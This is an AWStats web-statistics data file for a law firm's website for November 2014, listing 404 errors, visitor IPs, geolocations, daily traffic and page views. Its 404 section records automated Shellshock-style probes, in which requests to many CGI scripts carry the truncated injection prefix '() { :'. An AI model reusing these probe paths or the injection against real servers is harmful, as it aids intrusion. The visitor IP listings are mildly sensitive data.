/cgi-bin/man.shHTTP/1.0 2 -
/cgi-bin/lastlines.cgi 2 ()%20{%20:
/cgi-bin/alienform.cgi 2 ()%20{%20:
/redirects/redir.cgi 2 ()%20{%20:
/setpasswd.cgi 2 ()%20{%20:
/cgi-bin/mail/emumail.cgi 2 ()%20{%20:
/sampleposteddata.cgi 2 ()%20{%20:
/wwwboard/wwwboard.cgi 2 ()%20{%20:
/cgi-sys/signup.cgi 2 ()%20{%20:
/CSNews.cgi 2 ()%20{%20:
/cgi-bin/CSMailto.cgi 2 ()%20{%20:
/cgi-bin/c_download.cgi 2 ()%20{%20:
/api/process.php 1 -
END_SIDER_404

# Plugin key - Pages - Hits - Bandwidth - Last access
BEGIN_PLUGIN_geoip_city_maxmind 22
unknown 0 533 0 0
ar_rosario_21 0 112 0 0
us_washington_dc 0 8 0 0
ar_buenos%20aires_07 0 6 0 0
us_sterling_va 0 4 0 0
us_woodbridge_nj 0 4 0 0
de_kiez_12 0 2 0 0
us_malvern_pa 0 2 0 0
us_houston_tx 0 2 0 0
de_muenster_07 0 2 0 0
ar_venado%20tuerto_21 0 1 0 0
us_san%20antonio_tx 0 1 0 0
es_boadilla%20del%20monte_29 0 1 0 0
de_nürnberg_02 0 1 0 0
us_san%20diego_ca 0 1 0 0
us_seattle_wa 0 1 0 0
de_baden_01 0 1 0 0
cz_krupka_89 0 1 0 0
us_columbus_oh 0 1 0 0
us_eau%20claire_wi 0 1 0 0
rs_grocka_00 0 1 0 0
cz_chomutov_89 0 1 0 0
END_PLUGIN_geoip_city_maxmind

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 88
186.12.224.211 5 6 47527 20141111104436
190.2.113.49 4 59 870435 20141103132033
190.193.206.218 4 59 870435 20141120191248
69.58.178.58 4 4 17644 20141106061220
38.100.21.61 3 8 26809 20141124034926
201.212.124.86 3 53 736038 20141108183725
191.236.17.122 3 3 975 20141119180746
74.52.245.146 2 2 7564 20141117124003
144.76.185.173 2 2 19688 20141117210951
193.174.89.19 2 2 650 20141117163813
162.244.33.8 1 1 325 20141119233501
130.211.147.221 1 1 325 20141115113902
130.211.159.84 1 1 325 20141102113938
130.211.159.151 1 1 325 20141125113643
104.154.25.126 1 38 426321 20141120110244
93.170.186.71 1 1 325 20141104142347
192.211.50.42 1 1 325 20141110131540
164.40.153.130 1 1 325 20141104225634
104.154.18.169 1 26 410904 20141115063537
130.211.152.0 1 1 325 20141107113903
54.67.15.210 1 1 325 20141111045930
5.45.77.35 1 1 325 20141103032800
23.89.209.90 1 1 325 20141121123815
198.178.124.47 1 1 325 20141104000612
130.211.168.78 1 1 325 20141114113913
130.211.162.186 1 1 325 20141122113711
157.55.80.72 0 64 825268 
188.240.88.250 1 1 325 20141126064230
104.192.0.19 1 1 325 20141123023914
130.211.182.255 1 1 325 20141121113752
190.11.154.56 0 1 13008 
130.211.153.160 1 1 325 20141104113923
104.154.22.131 1 40 429651 20141129003610
91.121.100.66 2 2 650 20141121182713
130.211.131.161 1 1 325 20141128113754
130.211.179.11 1 1 325 20141111113847
54.173.38.232 1 1 325 20141112114659
37.59.40.201 1 1 325 20141111031629
80.28.159.246 0 1 9289 
104.154.25.102 1 7 249379 20141128030204
155.94.254.143 2 2 650 20141115205609
130.211.132.101 1 1 325 20141117113802
89.179.255.51 1 1 325 20141106024316
130.211.151.39 1 1 325 20141112113915
209.126.230.71 1 1 325 20141125065521
130.211.129.14 1 1 325 20141126113752
71.40.14.124 1 1 325 20141112054214
93.171.205.23 1 1 325 20141127015138
130.211.148.232 1 1 325 20141105113858
82.117.208.243 1 1 325 20141129092454
72.21.217.96 1 1 325 20141112114305
134.249.167.157 1 1 325 20141117131442
92.63.88.42 1 1 325 20141109064406
54.89.98.29 1 1 325 20141111000458
130.211.168.188 1 1 325 20141130113652
130.211.188.50 1 1 325 20141108113903
130.211.132.165 1 1 325 20141109113822
107.150.52.83 1 1 325 20141110024556
171.217.185.173 1 1 325 20141114075523
130.211.187.182 1 1 325 20141120113758
130.211.141.19 1 1 325 20141103113925
188.92.76.167 2 2 325 20141106162102
176.102.38.73 1 1 0 20141104050106
85.10.199.67 1 1 0 20141128045011
130.211.181.232 1 1 325 20141106113904
130.211.163.187 1 1 325 20141116113852
104.154.19.30 1 13 383137 20141112045747
54.76.152.15 1 1 325 20141125065340
130.211.156.234 1 1 325 20141101113958
104.154.31.77 1 38 426321 20141108160424
104.154.20.244 1 26 410904 20141108070044
104.154.24.197 1 40 429651 20141117165729
96.0.153.101 1 1 325 20141128093529
104.154.21.89 1 40 429651 20141120032221
192.184.42.203 2 2 650 20141119022246
130.211.153.112 2 2 650 20141123113748
130.211.179.79 1 1 325 20141124113746
107.182.132.117 2 9 241247 20141129195619
130.211.160.184 1 1 325 20141127113648
200.16.89.152 1 12 363767 20141110134409
130.211.176.104 1 1 325 20141119113733
130.211.163.255 1 1 325 20141113113955
104.154.26.147 1 26 410904 20141112210438
130.211.188.217 1 1 325 20141110113839
130.211.129.130 1 1 325 20141129113647
192.74.232.129 2 2 650 20141128010127
141.0.8.142 0 1 13008 
104.154.25.169 1 40 429651 20141119093516
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 30
20141101 1 1 325 1
20141102 1 2 13333 1
20141103 7 62 871085 4
20141104 6 6 1625 6
20141105 1 1 325 1
20141106 7 7 18619 4
20141107 1 1 325 1
20141108 6 118 1573588 4
20141109 2 2 650 2
20141110 4 15 364742 4
20141111 9 74 874095 5
20141112 6 43 795341 6
20141113 2 2 650 2
20141114 3 4 13983 3
20141115 3 28 411554 3
20141116 1 1 325 1
20141117 8 47 457878 6
20141118 2 2 650 2
20141119 7 47 440890 5
20141120 7 138 1726732 4
20141121 3 3 975 3
20141122 1 1 325 1
20141123 2 2 650 2
20141124 4 9 27134 2
20141125 3 3 975 3
20141126 2 2 650 2
20141127 2 2 650 2
20141128 6 12 250679 5
20141129 5 51 671548 4
20141130 1 1 325 1
END_DAY

# Session range - Number of visits
BEGIN_SESSION 3
0s-30s 84
30s-2mn 4
2mn-5mn 2
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 7
/ 77 24050 73 69
/www.cacaceasoc.com/El_Estudio.html 15 236865 11 13
/www.cacaceasoc.com/Home.html 8 57912 0 3
/www.cacaceasoc.com/Socios_%26_Profesionales.html 6 55068 5 2
/www.cacaceasoc.com/Areas_de_Practica.html 5 48775 0 3
/www.cacaceasoc.com/ 1 306 0 0
/www.cacaceasoc.com/English.html 1 10510 1 0
END_SIDER
